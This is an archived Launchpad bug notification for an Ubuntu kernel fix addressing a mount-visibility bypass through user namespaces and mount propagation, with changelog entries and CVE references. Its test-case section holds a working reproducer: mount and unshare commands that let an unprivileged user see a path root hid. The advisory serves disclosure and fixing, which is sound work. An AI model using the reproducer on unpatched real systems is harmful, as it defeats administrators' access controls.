group.of.nepali.translators team mailing list archive
-
group.of.nepali.translators team
-
Mailing list archive
-
Message #27346
[Bug 1789161] Re: Bypass of mount visibility through userns + mount propagation
This bug was fixed in the package linux - 3.13.0-163.213
---------------
linux (3.13.0-163.213) trusty; urgency=medium
* linux: 3.13.0-163.213 -proposed tracker (LP: #1802769)
* Bypass of mount visibility through userns + mount propagation (LP: #1789161)
- mount: Retest MNT_LOCKED in do_umount
- mount: Don't allow copying MNT_UNBINDABLE|MNT_LOCKED mounts
* dev test in ubuntu_stress_smoke_test cause kernel oops on T-3.13
(LP: #1797546)
- drm: fix NULL pointer access by wrong ioctl
* Packaging resync (LP: #1786013)
- [Package] add support for specifying the primary makefile
-- Thadeu Lima de Souza Cascardo <cascardo@xxxxxxxxxxxxx> Tue, 13 Nov
2018 13:30:30 -0200
** Changed in: linux (Ubuntu Trusty)
Status: Fix Committed => Fix Released
** Changed in: linux (Ubuntu Cosmic)
Status: Fix Committed => Fix Released
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-18653
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-18955
** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-6559
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1789161
Title:
Bypass of mount visibility through userns + mount propagation
Status in linux package in Ubuntu:
Fix Committed
Status in linux source package in Trusty:
Fix Released
Status in linux source package in Xenial:
Fix Committed
Status in linux source package in Bionic:
Fix Committed
Status in linux source package in Cosmic:
Fix Released
Status in linux source package in Disco:
Fix Committed
Bug description:
[Impact]
Jonathan Calmels from NVIDIA reported that he's able to bypass the
mount visibility security check in place in the Linux kernel by using
a combination of the unbindable property along with the private mount
propagation option to allow a unprivileged user to see a path which
was purposefully hidden by the root user.
[Test Case]
Reproducer:
# Hide a path to all users using a tmpfs
root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
root@castiana:~#
# As an unprivileged user, unshare user namespace and mount namespace
stgraber@castiana:~$ unshare -U -m -r
# Confirm the path is still not accessible
root@castiana:~# ls /sys/devices/
# Make /sys recursively unbindable and private
root@castiana:~# mount --make-runbindable /sys
root@castiana:~# mount --make-private /sys
# Recursively bind-mount the rest of /sys over to /mnnt
root@castiana:~# mount --rbind /sys/ /mnt
# Access our hidden /sys/device as an unprivileged user
root@castiana:~# ls /mnt/devices/
breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual
[Regression Potential]
Low. The fixes are relatively simple. Regressions would most likely be
specific to software utilizing user namespaces + mount propagation
which is a small (but often important) portion of the Ubuntu archive.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1789161/+subscriptions